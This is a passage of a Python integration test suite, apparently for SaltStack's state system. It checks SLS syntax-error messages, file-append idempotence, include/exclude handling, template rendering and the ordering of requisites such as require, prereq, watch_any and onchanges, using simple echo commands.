def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if existing
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
        # Now the problematic #2068 template including dots
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
        Ensure these errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
        # an undetected infinite loop prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
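        # Each normalized entry keeps only the four fields these tests compare,
        # for example:
        #   'cmd_|-A_|-echo A_|-run': {'__run_num__': 0,
        #                              'comment': 'Command "echo A" run',
        #                              'result': True, 'changes': True}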
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
                'changes': descr['changes'] != {}  # whether there were any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
        # And why does it prevent it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
        Call sls file containing several require_any requisites.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
        Call sls file containing several require_any requisites.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
        Call sls file containing several watch_any requisites.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
        Call sls file containing several watch_any requisites.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
        Call sls file containing several onchanges_any requisites.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
        Call sls file containing several onfail_any requisites.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
        Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
        # if chain-use is added after #8774 is resolved, these tests might become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
        # First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
